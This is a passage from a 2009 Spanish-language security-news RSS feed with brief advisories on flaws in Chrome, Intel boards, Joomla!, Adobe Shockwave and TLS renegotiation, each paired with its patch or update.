<p>Steve Dispensa, director de tecnología de PhoneFactor afirma que ya que el fallo está en el propio protocolo y no es su implementación, <strong>“el impacto tiene mucho más alcance”</strong>. Por lo tanto, el experto en seguridad afirma que todas las librerías SSL tienen que ser parcheadas y la mayoría de las aplicaciones de clientes y servidores “necesitarán, como mínimo, incluir copias de librerías SSL en sus productos”.</p>
<p>Fuente: ITespresso</p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google Chrome: nuevas vulnerabilidades]]></title>
<link>http://hackingetico.wordpress.com/2009/11/09/google-chrome-nuevas-vulnerabilidades/</link>
<pubDate>Mon, 09 Nov 2009 16:00:34 +0000</pubDate>
<dc:creator>hackingetico</dc:creator>
<guid>http://hackingetico.wordpress.com/2009/11/09/google-chrome-nuevas-vulnerabilidades/</guid>
<description><![CDATA[Algunas vulnerabilidades han sido detectadas en Google Chrome, que potencialmente puede ser explotad]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p>Algunas vulnerabilidades han sido detectadas en Google Chrome, que potencialmente puede ser explotadas por usuarios maliciosos para revelar información sensible o comprometer nuestro sistema.</p>
<p>En la primera vulnerabilidad encontrada, el navegador no puede mostrar una advertencia de seguridad cuando un usuario descarga y abre por ejemplo archivos XML, SVG o MHT. Esto puede ser explotado potencialmente para ejecutar código JavaScript arbitrario de forma local y divulgar el contenido de nuestros archivos locales a través de una página web especialmente diseñado para ello.</p>
<p><!--more--></p>
<p>La segunda vulnerabilidad trata de un error en la aplicación de SQL Gears API que puede ser aprovechado para poner metadatos de SQL corruptos  y causar una corrupción de memoria. La explotación exitosa de esta vulnerabilidad puede permitir la ejecución de código arbitrario, pero requiere que el usuario permita la interacción de un sitio web malicioso con el plug-in Gears.</p>
<p>Las vulnerabilidades se presentan en versiones anteriores a la 3.0.195.32.</p>
<p>SOLUCIÓN: Actualizar a la versión 3.0.195.32.</p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Vulnerabilidad en placas de Intel]]></title>
<link>http://hackingetico.wordpress.com/2009/11/06/vulnerabilidad-en-placas-de-intel/</link>
<pubDate>Fri, 06 Nov 2009 16:00:45 +0000</pubDate>
<dc:creator>hackingetico</dc:creator>
<guid>http://hackingetico.wordpress.com/2009/11/06/vulnerabilidad-en-placas-de-intel/</guid>
<description><![CDATA[Para usuarios de placas Intel DQ35JO, DQ35MP, DQ45CB y DQ45EK. Se ha detectado una vulnerabilidad qu]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p><img class="aligncenter" title="Intel" src="http://www.dc.uba.ar/events/eci/2009/eci2009auspiciantes/intel-logo" alt="" width="129" height="110" /></p>
<p>Para usuarios de placas Intel DQ35JO, DQ35MP, DQ45CB y DQ45EK.</p>
<p>Se ha detectado una vulnerabilidad que puede ser explotada por usuarios maliciosos locales y pueden provocar una denegación de servicio (DoS) o una escalada de privilegios.</p>
<p>Solución: actualizar la BIOS.</p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft adelanta sus próximos boletines de seguridad de noviembre]]></title>
<link>http://seguinfo.wordpress.com/2009/11/06/microsoft-adelanta-sus-proximos-boletines-de-seguridad-de-noviembre/</link>
<pubDate>Fri, 06 Nov 2009 15:53:00 +0000</pubDate>
<dc:creator>seguinfo</dc:creator>
<guid>http://seguinfo.wordpress.com/2009/11/06/microsoft-adelanta-sus-proximos-boletines-de-seguridad-de-noviembre/</guid>
<description><![CDATA[Microsoft ha enviado su notificación adelantada referente a los boletines de seguridad que liberará ]]></description>
<content:encoded><![CDATA[Microsoft ha enviado su notificación adelantada referente a los boletines de seguridad que liberará ]]></content:encoded>
</item>
<item>
<title><![CDATA[Manipulación de artículos y descubrimiento de versiones en Joomla!]]></title>
<link>http://hackingetico.wordpress.com/2009/11/06/199/</link>
<pubDate>Fri, 06 Nov 2009 07:07:56 +0000</pubDate>
<dc:creator>hackingetico</dc:creator>
<guid>http://hackingetico.wordpress.com/2009/11/06/199/</guid>
<description><![CDATA[En las últimas horas se han descubierto algunos problemas de seguridad en Joomla!. Se trata de falla]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p><img class="aligncenter" title="Joomla!" src="http://images.gxware.org/upload/gallery/joomla_logo.png" alt="" width="213" height="143" /></p>
<p>En las últimas horas se han descubierto algunos problemas de seguridad en Joomla!. Se trata de fallas que permite descubrir versiones de ciertos módulos y que permite a usuarios maliciosos a manipular ciertos datos.</p>
<p>En concreto se trata de un error en el manejo de archivos XML que puede ser explotado para ver la versión de los módulos instalados. Además un error no especificado en la solicitud de datos puede ser explotado para modificar artículos de la página principal de otros usuarios.</p>
<p>Los problemas de seguridad se presentan en versiones anteriores a la 1.5.15.</p>
<p>SOLUCIÓN: Actualizar a la versión 1.5.15 y restringir el acceso a los archivos XML (por ejemplo, a través de un &#8220;. Htaccess&#8221;).</p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Múltiples vulnerabilidades en Adobe Shockwave Player]]></title>
<link>http://hackingetico.wordpress.com/2009/11/06/multiples-vulnerabilidades-en-adobe-shockwave-player/</link>
<pubDate>Fri, 06 Nov 2009 06:55:09 +0000</pubDate>
<dc:creator>hackingetico</dc:creator>
<guid>http://hackingetico.wordpress.com/2009/11/06/multiples-vulnerabilidades-en-adobe-shockwave-player/</guid>
<description><![CDATA[En las últimas horas se han detectado múltiples vulnerabilidades en el Shockwave Player de Adobe. La]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p><img class="aligncenter" title="Shockwave Player" src="http://www.adobe.com/products/shockwaveplayer/images/adobe_shockwave_player.gif" alt="" width="173" height="120" /></p>
<p>En las últimas horas se han detectado múltiples vulnerabilidades en el Shockwave Player de Adobe. Las relaciono a continuación:</p>
<p>1) Un error relacionado con el uso de un índice no válido permite la ejecución de código arbitrario a través de Shockwavecontent.</p>
<p>2) Un error relacionado con el uso de un puntero no válido permite la ejecución de código arbitrario a través de Shockwavecontent.</p>
<p><!--more--></p>
<p>3) Un error relacionado con el uso de un puntero no válido permite la ejecución de código arbitrario a través de craftedShockwave.</p>
<p>4) Un error en el tratamiento de longitudes de cadena puede ser explotado para provocar una corrupción de la memoria y permitir la ejecución de código arbitrario.</p>
<p>Las vulnerabilidades afectan a la versión 11.5.1.601 y anteriores.</p>
<p>SOLUCIÓN: Actualizar a la versión 11.5.2.602: http://get.adobe.com/shockwave/</p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Se hace pública vulnerabilidad 'Man-in-the-middle' en la renegociación TLS]]></title>
<link>http://seguinfo.wordpress.com/2009/11/06/se-hace-publica-vulnerabilidad-man-in-the-middle-en-la-renegociacion-tls/</link>
<pubDate>Fri, 06 Nov 2009 01:11:00 +0000</pubDate>
<dc:creator>seguinfo</dc:creator>
<guid>http://seguinfo.wordpress.com/2009/11/06/se-hace-publica-vulnerabilidad-man-in-the-middle-en-la-renegociacion-tls/</guid>
<description><![CDATA[TLS 1.0+ y SSL&nbsp;3.0+&nbsp; (conocido entre otros &#8220;https&#8221;) esvulnerable a una debilid]]></description>
<content:encoded><![CDATA[TLS 1.0+ y SSL&nbsp;3.0+&nbsp; (conocido entre otros &#8220;https&#8221;) esvulnerable a una debilid]]></content:encoded>
</item>

</channel>
</rss>
